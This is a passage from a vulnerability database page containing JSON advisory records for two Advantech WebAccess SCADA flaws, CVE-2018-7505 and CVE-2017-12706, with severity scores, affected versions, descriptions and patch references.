"2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2018-13785", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "e2f700a1-39ab-11e9-8a88-000c29342cb1", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-137537", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2018-7505", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2018-7505", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2018-7505", "trust": 0.8, "value": "Critical" }, { "author": "ZDI", "id": "CVE-2018-7505", "trust": 0.7, "value": "HIGH" }, { "author": "CNVD", "id": "CNVD-2018-13785", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201805-443", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "e2f700a1-39ab-11e9-8a88-000c29342cb1", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-137537", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "e2f700a1-39ab-11e9-8a88-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-470" }, { "db": "CNVD", "id": "CNVD-2018-13785" }, { "db": "VULHUB", "id": "VHN-137537" }, { "db": "JVNDB", "id": "JVNDB-2018-005075" }, { "db": "CNNVD", "id": "CNNVD-201805-443" }, { "db": "NVD", "id": "CVE-2018-7505" } ] }, "description": { "_id": null, "data": "In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, a TFTP application has unrestricted file uploads to the web application without authorization, which may allow an attacker to execute arbitrary code. plural Advantech WebAccess The product contains a vulnerability related to unlimited uploads of dangerous types of files.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute code on vulnerable installations of Advantech WebAccess NMS. Authentication is not required to exploit this vulnerability.The specific flaw exists within the configuration of the TFTP service. The issue results from the lack of proper validation of user-supplied data, which can allow for the upload of arbitrary files. An attacker can leverage this vulnerability to execute code under the context of SYSTEM. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A privilege elevation vulnerability exists in several Advantech products that stems from a TFTP application that allows unauthorized uploading of arbitrary files to a web application. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple SQL-injection vulnerabilities\n2. An information-disclosure vulnerability\n3. A file-upload vulnerability\n4. Multiple directory-traversal vulnerabilities\n5. Multiple stack-based buffer-overflow vulnerabilities\n6. A heap-based buffer-overflow vulnerability\n7. Multiple arbitrary code-execution vulnerabilities\n8. A denial-of-service vulnerability\n9. A security-bypass vulnerability\n10. Failed attacks will cause denial of service conditions. Advantech WebAccess, etc. Advantech WebAccess is a set of HMI/SCADA software based on browser architecture. An escalation of privilege vulnerability exists in several Advantech products. The following versions are affected: Advantech WebAccess 8.2_20170817 and earlier, 8.3.0 and earlier; WebAccess Dashboard 2.0.15 and earlier; WebAccess Scada Node 8.3.1 and earlier; WebAccess/NMS 2.0.3 and earlier", "sources": [ { "db": "NVD", "id": "CVE-2018-7505" }, { "db": "JVNDB", "id": "JVNDB-2018-005075" }, { "db": "ZDI", "id": "ZDI-18-470" }, { "db": "CNVD", "id": "CNVD-2018-13785" }, { "db": "BID", "id": "104190" }, { "db": "IVD", "id": "e2f700a1-39ab-11e9-8a88-000c29342cb1" }, { "db": "VULHUB", "id": "VHN-137537" } ], "trust": 3.33 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2018-7505", "trust": 4.3 }, { "db": "ICS CERT", "id": "ICSA-18-135-01", "trust": 3.4 }, { "db": "BID", "id": "104190", "trust": 2.6 }, { "db": "CNNVD", "id": "CNNVD-201805-443", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2018-13785", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2018-005075", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-5476", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-18-470", "trust": 0.7 }, { "db": "IVD", "id": "E2F700A1-39AB-11E9-8A88-000C29342CB1", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-137537", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "e2f700a1-39ab-11e9-8a88-000c29342cb1" }, { "db": "ZDI", "id": "ZDI-18-470" }, { "db": "CNVD", "id": "CNVD-2018-13785" }, { "db": "VULHUB", "id": "VHN-137537" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005075" }, { "db": "CNNVD", "id": "CNNVD-201805-443" }, { "db": "NVD", "id": "CVE-2018-7505" } ] }, "id": "VAR-201805-1146", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "e2f700a1-39ab-11e9-8a88-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-13785" }, { "db": "VULHUB", "id": "VHN-137537" } ], "trust": 1.5434040525000001 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "e2f700a1-39ab-11e9-8a88-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2018-13785" } ] }, "last_update_date": "2024-11-23T21:53:07.489000Z", "patch": { "_id": null, "data": [ { "title": "\u30c8\u30c3\u30d7\u30da\u30fc\u30b8", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "https://ics-cert.us-cert.gov/advisories/ICSA-18-135-01" }, { "title": "Patches for multiple Advantech product privilege escalation vulnerabilities", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/135201" }, { "title": "Multiple Advantech Product Privilege License and Access Control Vulnerability Fixes", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=80053" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-470" }, { "db": "CNVD", "id": "CNVD-2018-13785" }, { "db": "JVNDB", "id": "JVNDB-2018-005075" }, { "db": "CNNVD", "id": "CNNVD-201805-443" } ] }, "problemtype_data": { "_id": null, "data": [ { "problemtype": "CWE-434", "trust": 1.9 }, { "problemtype": "CWE-264", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-137537" }, { "db": "JVNDB", "id": "JVNDB-2018-005075" }, { "db": "NVD", "id": "CVE-2018-7505" } ] }, "references": { "_id": null, "data": [ { "trust": 4.1, "url": "https://ics-cert.us-cert.gov/advisories/icsa-18-135-01" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/104190" }, { "trust": 0.8, "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-7505" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2018-7505" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "ZDI", "id": "ZDI-18-470" }, { "db": "CNVD", "id": "CNVD-2018-13785" }, { "db": "VULHUB", "id": "VHN-137537" }, { "db": "BID", "id": "104190" }, { "db": "JVNDB", "id": "JVNDB-2018-005075" }, { "db": "CNNVD", "id": "CNNVD-201805-443" }, { "db": "NVD", "id": "CVE-2018-7505" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e2f700a1-39ab-11e9-8a88-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-18-470", "ident": null }, { "db": "CNVD", "id": "CNVD-2018-13785", "ident": null }, { "db": "VULHUB", "id": "VHN-137537", "ident": null }, { "db": "BID", "id": "104190", "ident": null }, { "db": "JVNDB", "id": "JVNDB-2018-005075", "ident": null }, { "db": "CNNVD", "id": "CNNVD-201805-443", "ident": null }, { "db": "NVD", "id": "CVE-2018-7505", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2018-07-24T00:00:00", "db": "IVD", "id": "e2f700a1-39ab-11e9-8a88-000c29342cb1", "ident": null }, { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-470", "ident": null }, { "date": "2018-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2018-13785", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "VULHUB", "id": "VHN-137537", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005075", "ident": null }, { "date": "2018-05-16T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-443", "ident": null }, { "date": "2018-05-15T22:29:00.643000", "db": "NVD", "id": "CVE-2018-7505", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2018-05-18T00:00:00", "db": "ZDI", "id": "ZDI-18-470", "ident": null }, { "date": "2018-07-24T00:00:00", "db": "CNVD", "id": "CNVD-2018-13785", "ident": null }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-137537", "ident": null }, { "date": "2018-05-15T00:00:00", "db": "BID", "id": "104190", "ident": null }, { "date": "2018-07-05T00:00:00", "db": "JVNDB", "id": "JVNDB-2018-005075", "ident": null }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201805-443", "ident": null }, { "date": "2024-11-21T04:12:15.683000", "db": "NVD", "id": "CVE-2018-7505", "ident": null } ] }, "threat_type": { "_id": null, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201805-443" } ], "trust": 0.6 }, "title": { "_id": null, "data": "plural Advantech WebAccess Product unrestricted upload vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2018-005075" } ], "trust": 0.8 }, "type": { "_id": null, "data": "Code problem", "sources": [ { "db": "IVD", "id": "e2f700a1-39ab-11e9-8a88-000c29342cb1" }, { "db": "CNNVD", "id": "CNNVD-201805-443" } ], "trust": 0.8 } }
var-201708-1120
Vulnerability from variot
A stack-based buffer overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities where there is a lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer, which could allow an attacker to execute arbitrary code under the context of the process. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple stack-based buffer-overflow vulnerabilities 2. Multiple heap-based buffer-overflow vulnerabilities. 3. Multiple memory-corruption vulnerabilities. 4. An SQL-injection vulnerability. 5. A format-string vulnerability. 6. An authentication-bypass vulnerability. 7. A security-bypass vulnerability. 8. A privilege-escalation vulnerability. 9. A remote-code execution vulnerability. This may aid in further attacks. Advantech WebAccess versions prior to V8.2_20170817 are vulnerable. The vulnerability stems from the fact that the program does not fully verify the length of the data submitted by the user
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201708-1120", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "8.2" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "8.2_20170817" }, { "model": "webaccess \u003cv8.2 20170817", "scope": null, "trust": 0.6, "vendor": "advantech", "version": null }, { "model": "webaccess 8.2 20170330", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.1 20160519", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess 8.0 20150816", "scope": null, "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "eq", "trust": 0.3, "vendor": "advantech", "version": "8" }, { "model": "webaccess 8.2 20170817", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": null }, { "model": "webaccess", "scope": "ne", "trust": 0.3, "vendor": "advantech", "version": "8.1" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "019b6182-3d02-43c0-aac0-978e45e37a6d" }, { "db": "CNVD", "id": "CNVD-2017-23884" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007573" }, { "db": "CNNVD", "id": "CNNVD-201708-1279" }, { "db": "NVD", "id": "CVE-2017-12706" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007573" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Fritz Sands, rgod, Tenable Network Security,an anonymous researcher all working with Trend Micro??s Zero Day Initiative, and Haojun Hou and DongWang from ADLab of Venustech.", "sources": [ { "db": "BID", "id": "100526" } ], "trust": 0.3 }, "cve": "CVE-2017-12706", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CVE-2017-12706", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "CNVD-2017-23884", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "019b6182-3d02-43c0-aac0-978e45e37a6d", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "VHN-103255", "impactScore": 6.4, "integrityImpact": "PARTIAL", "severity": "HIGH", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [ { "attackComplexity": "LOW", "attackVector": "NETWORK", "author": "nvd@nist.gov", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "exploitabilityScore": 3.9, "id": "CVE-2017-12706", "impactScore": 5.9, "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "trust": 1.8, "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0" } ], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2017-12706", "trust": 1.0, "value": "CRITICAL" }, { "author": "NVD", "id": "CVE-2017-12706", "trust": 0.8, "value": "Critical" }, { "author": "CNVD", "id": "CNVD-2017-23884", "trust": 0.6, "value": "HIGH" }, { "author": "CNNVD", "id": "CNNVD-201708-1279", "trust": 0.6, "value": "CRITICAL" }, { "author": "IVD", "id": "019b6182-3d02-43c0-aac0-978e45e37a6d", "trust": 0.2, "value": "CRITICAL" }, { "author": "VULHUB", "id": "VHN-103255", "trust": 0.1, "value": "HIGH" } ] } ], "sources": [ { "db": "IVD", "id": "019b6182-3d02-43c0-aac0-978e45e37a6d" }, { "db": "CNVD", "id": "CNVD-2017-23884" }, { "db": "VULHUB", "id": "VHN-103255" }, { "db": "JVNDB", "id": "JVNDB-2017-007573" }, { "db": "CNNVD", "id": "CNNVD-201708-1279" }, { "db": "NVD", "id": "CVE-2017-12706" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "A stack-based buffer overflow issue was discovered in Advantech WebAccess versions prior to V8.2_20170817. Researchers have identified multiple vulnerabilities where there is a lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer, which could allow an attacker to execute arbitrary code under the context of the process. Advantech WebAccess Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Advantech WebAccess is a suite of browser-based HMI/SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. Advantech WebAccess is prone to the following security vulnerabilities:\n1. Multiple stack-based buffer-overflow vulnerabilities\n2. Multiple heap-based buffer-overflow vulnerabilities. \n3. Multiple memory-corruption vulnerabilities. \n4. An SQL-injection vulnerability. \n5. A format-string vulnerability. \n6. An authentication-bypass vulnerability. \n7. A security-bypass vulnerability. \n8. A privilege-escalation vulnerability. \n9. A remote-code execution vulnerability. This may aid in further attacks. \nAdvantech WebAccess versions prior to V8.2_20170817 are vulnerable. The vulnerability stems from the fact that the program does not fully verify the length of the data submitted by the user", "sources": [ { "db": "NVD", "id": "CVE-2017-12706" }, { "db": "JVNDB", "id": "JVNDB-2017-007573" }, { "db": "CNVD", "id": "CNVD-2017-23884" }, { "db": "BID", "id": "100526" }, { "db": "IVD", "id": "019b6182-3d02-43c0-aac0-978e45e37a6d" }, { "db": "VULHUB", "id": "VHN-103255" } ], "trust": 2.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2017-12706", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-17-241-02", "trust": 3.4 }, { "db": "BID", "id": "100526", "trust": 2.0 }, { "db": "CNNVD", "id": "CNNVD-201708-1279", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2017-23884", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2017-007573", "trust": 0.8 }, { "db": "IVD", "id": "019B6182-3D02-43C0-AAC0-978E45E37A6D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-103255", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "019b6182-3d02-43c0-aac0-978e45e37a6d" }, { "db": "CNVD", "id": "CNVD-2017-23884" }, { "db": "VULHUB", "id": "VHN-103255" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007573" }, { "db": "CNNVD", "id": "CNNVD-201708-1279" }, { "db": "NVD", "id": "CVE-2017-12706" } ] }, "id": "VAR-201708-1120", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "019b6182-3d02-43c0-aac0-978e45e37a6d" }, { "db": "CNVD", "id": "CNVD-2017-23884" }, { "db": "VULHUB", "id": "VHN-103255" } ], "trust": 1.582962455 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "019b6182-3d02-43c0-aac0-978e45e37a6d" }, { "db": "CNVD", "id": "CNVD-2017-23884" } ] }, "last_update_date": "2024-11-23T21:53:49.609000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://www.advantech.com/industrial-automation/webaccess" }, { "title": "Patch for Advantech WebAccess Stack Buffer Overflow Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/101168" }, { "title": "Advantech WebAccess Buffer error vulnerability fix", "trust": 0.6, "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=74368" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23884" }, { "db": "JVNDB", "id": "JVNDB-2017-007573" }, { "db": "CNNVD", "id": "CNNVD-201708-1279" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-119", "trust": 1.9 }, { "problemtype": "CWE-121", "trust": 1.0 } ], "sources": [ { "db": "VULHUB", "id": "VHN-103255" }, { "db": "JVNDB", "id": "JVNDB-2017-007573" }, { "db": "NVD", "id": "CVE-2017-12706" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 3.4, "url": "https://ics-cert.us-cert.gov/advisories/icsa-17-241-02" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/100526" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-12706" }, { "trust": 0.8, "url": "https://nvd.nist.gov/vuln/detail/cve-2017-12706" }, { "trust": 0.3, "url": "http://webaccess.advantech.com" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2017-23884" }, { "db": "VULHUB", "id": "VHN-103255" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007573" }, { "db": "CNNVD", "id": "CNNVD-201708-1279" }, { "db": "NVD", "id": "CVE-2017-12706" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "019b6182-3d02-43c0-aac0-978e45e37a6d" }, { "db": "CNVD", "id": "CNVD-2017-23884" }, { "db": "VULHUB", "id": "VHN-103255" }, { "db": "BID", "id": "100526" }, { "db": "JVNDB", "id": "JVNDB-2017-007573" }, { "db": "CNNVD", "id": "CNNVD-201708-1279" }, { "db": "NVD", "id": "CVE-2017-12706" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-30T00:00:00", "db": "IVD", "id": "019b6182-3d02-43c0-aac0-978e45e37a6d" }, { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23884" }, { "date": "2017-08-30T00:00:00", "db": "VULHUB", "id": "VHN-103255" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007573" }, { "date": "2017-08-31T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1279" }, { "date": "2017-08-30T18:29:00.483000", "db": "NVD", "id": "CVE-2017-12706" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2017-08-30T00:00:00", "db": "CNVD", "id": "CNVD-2017-23884" }, { "date": "2019-10-09T00:00:00", "db": "VULHUB", "id": "VHN-103255" }, { "date": "2017-08-29T00:00:00", "db": "BID", "id": "100526" }, { "date": "2017-09-25T00:00:00", "db": "JVNDB", "id": "JVNDB-2017-007573" }, { "date": "2019-10-17T00:00:00", "db": "CNNVD", "id": "CNNVD-201708-1279" }, { "date": "2024-11-21T03:10:03.970000", "db": "NVD", "id": "CVE-2017-12706" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201708-1279" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Buffer error vulnerability", "sources": [ { "db": "JVNDB", "id": "JVNDB-2017-007573" }, { "db": "CNNVD", "id": "CNNVD-201708-1279" } ], "trust": 1.4 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Buffer error", "sources": [ { "db": "IVD", "id": "019b6182-3d02-43c0-aac0-978e45e37a6d" }, { "db": "CNNVD", "id": "CNNVD-201708-1279" } ], "trust": 0.8 } }
var-201601-0040
Vulnerability from variot
